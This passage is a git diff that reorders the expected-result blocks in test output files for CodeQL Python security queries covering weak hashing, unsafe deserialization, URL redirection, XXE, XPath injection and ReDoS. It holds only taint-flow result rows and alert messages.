ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. 
| test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | -| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | edges | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | provenance | | | test_cryptodome.py:2:23:2:34 | ControlFlowNode for get_password | test_cryptodome.py:13:17:13:28 | ControlFlowNode for get_password | provenance | | 
@@ -74,3 +61,16 @@ nodes | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | semmle.label | ControlFlowNode for get_password() | | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | semmle.label | ControlFlowNode for dangerous | subpaths +#select +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:2:37:2:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | test_cryptodome.py:8:19:8:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptodome.py:6:17:6:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | test_cryptodome.py:15:19:15:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. 
| test_cryptodome.py:13:17:13:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:2:23:2:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | test_cryptodome.py:24:19:24:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptodome.py:20:17:20:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. | test_cryptography.py:3:37:3:51 | ControlFlowNode for ImportMember | Sensitive data (certificate) | +| test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | test_cryptography.py:9:19:9:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure. 
| test_cryptography.py:7:17:7:33 | ControlFlowNode for get_certificate() | Sensitive data (certificate) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | test_cryptography.py:17:19:17:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (MD5) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:15:17:15:30 | ControlFlowNode for get_password() | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:3:23:3:34 | ControlFlowNode for ImportMember | Sensitive data (password) | +| test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | test_cryptography.py:27:19:27:27 | ControlFlowNode for dangerous | $@ is used in a hashing algorithm (SHA256) that is insecure for password hashing, since it is not a computationally expensive hash function. | test_cryptography.py:23:17:23:30 | ControlFlowNode for get_password() | Sensitive data (password) | 
diff --git a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected index 309ef858d3b4..bab1e34c912b 100644 --- a/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected +++ b/python/ql/test/query-tests/Security/CWE-502-UnsafeDeserialization/UnsafeDeserialization.expected 
@@ -1,9 +1,3 @@ -#select -| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | -| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. 
| unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | edges | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | provenance | | | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for request | unsafe_deserialization.py:14:15:14:21 | ControlFlowNode for request | provenance | | 
@@ -28,3 +22,9 @@ nodes | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | semmle.label | ControlFlowNode for payload | subpaths +#select +| unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:15:18:15:24 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:16:15:16:21 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:18:19:18:25 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:21:16:21:22 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | +| unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | unsafe_deserialization.py:24:24:24:30 | ControlFlowNode for payload | Unsafe deserialization depends on a $@. 
| unsafe_deserialization.py:8:26:8:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected index 3e43c112e2a3..551299a64dc4 100644 --- a/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected +++ b/python/ql/test/query-tests/Security/CWE-601-UrlRedirect/UrlRedirect.expected 
@@ -1,16 +1,3 @@ -#select -| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. 
| test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:7:14:7:20 | ControlFlowNode for request | provenance | | 
@@ -151,3 +138,16 @@ nodes | test.py:145:17:145:46 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | test.py:148:25:148:33 | ControlFlowNode for untrusted | semmle.label | ControlFlowNode for untrusted | subpaths +#select +| test.py:8:21:8:26 | ControlFlowNode for target | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:8:21:8:26 | ControlFlowNode for target | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:32:21:32:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:32:21:32:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:39:21:39:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:39:21:39:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:46:21:46:24 | ControlFlowNode for safe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:46:21:46:24 | ControlFlowNode for safe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:62:21:62:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:62:21:62:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:69:21:69:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:69:21:69:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. 
| test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:76:21:76:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:76:21:76:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:83:21:83:26 | ControlFlowNode for unsafe | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:83:21:83:26 | ControlFlowNode for unsafe | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:93:18:93:26 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:93:18:93:26 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:114:25:114:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:114:25:114:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:140:25:140:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:140:25:140:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:148:25:148:33 | ControlFlowNode for untrusted | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:148:25:148:33 | ControlFlowNode for untrusted | Untrusted URL redirection depends on a $@. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected index 11c3ec1b5221..b33d39f50718 100644 
--- a/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected +++ b/python/ql/test/query-tests/Security/CWE-611-Xxe/Xxe.expected @@ -1,6 +1,3 @@ -#select -| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:1:26:1:32 | ControlFlowNode for request | provenance | | | test.py:1:26:1:32 | ControlFlowNode for request | test.py:9:19:9:25 | ControlFlowNode for request | provenance | | @@ -19,3 +16,6 @@ nodes | test.py:20:19:20:25 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | | test.py:31:34:31:44 | ControlFlowNode for xml_content | semmle.label | ControlFlowNode for xml_content | subpaths +#select +| test.py:10:34:10:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:10:34:10:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:31:34:31:44 | ControlFlowNode for xml_content | test.py:1:26:1:32 | ControlFlowNode for ImportMember | test.py:31:34:31:44 | ControlFlowNode for xml_content | XML parsing depends on a $@ without guarding against external entity expansion. | test.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | 
diff --git a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected
index 6c13896e7884..4b1a2c40f7cf 100644
--- a/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected
+++ b/python/ql/test/query-tests/Security/CWE-643-XPathInjection/XpathInjection.expected
@@ -1,10 +1,3 @@ -#select -| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | -| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. 
| xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:10:5:10:9 | ControlFlowNode for value | provenance | AdditionalTaintStep | | xpathBad.py:10:5:10:9 | ControlFlowNode for value | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | provenance | | 
@@ -66,3 +59,10 @@ nodes | xpathFlow.py:47:18:47:44 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | semmle.label | ControlFlowNode for xpathQuery | subpaths +#select +| xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | xpathBad.py:9:7:9:13 | ControlFlowNode for request | xpathBad.py:13:20:13:43 | ControlFlowNode for BinaryExpr | XPath expression depends on a $@. | xpathBad.py:9:7:9:13 | ControlFlowNode for request | user-provided value | +| xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:14:20:14:29 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:23:29:23:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:32:29:32:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:41:31:41:40 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | xpathFlow.py:49:29:49:38 | ControlFlowNode for xpathQuery | XPath expression depends on a $@. 
| xpathFlow.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value |
diff --git a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected
index 22fcfd05fa19..aa8cea07ed16 100644
--- a/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected
+++ b/python/ql/test/query-tests/Security/CWE-730-PolynomialReDoS/PolynomialReDoS.expected
@@ -1,9 +1,3 @@ -#select -| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. 
| test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | edges | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:2:26:2:32 | ControlFlowNode for request | provenance | | | test.py:2:26:2:32 | ControlFlowNode for request | test.py:7:12:7:18 | ControlFlowNode for request | provenance | | 
@@ -32,3 +26,9 @@ nodes | test.py:18:28:18:31 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | | test.py:21:18:21:21 | ControlFlowNode for text | semmle.label | ControlFlowNode for text | subpaths +#select +| test.py:8:30:8:33 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:8:30:8:33 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:8:19:8:21 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:9:32:9:35 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:9:32:9:35 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with '0.9' and with many repetitions of '99'. | test.py:9:25:9:27 | \\d+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:12:17:12:20 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:12:17:12:20 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. | test.py:11:29:11:31 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:16:24:16:30 | ControlFlowNode for my_text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:16:24:16:30 | ControlFlowNode for my_text | This $@ that depends on a $@ may run slow on strings with many repetitions of ' '. 
| test.py:18:21:18:23 | \\s+ | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | +| test.py:21:18:21:21 | ControlFlowNode for text | test.py:2:26:2:32 | ControlFlowNode for ImportMember | test.py:21:18:21:21 | ControlFlowNode for text | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | test.py:20:271:20:272 | .* | regular expression | test.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | diff --git a/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected b/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected index 5a5a48f94560..16d29401f785 100644 --- a/python/ql/test/query-tests/Security/CWE-730-RegexInjection/RegexInjection.expected +++ 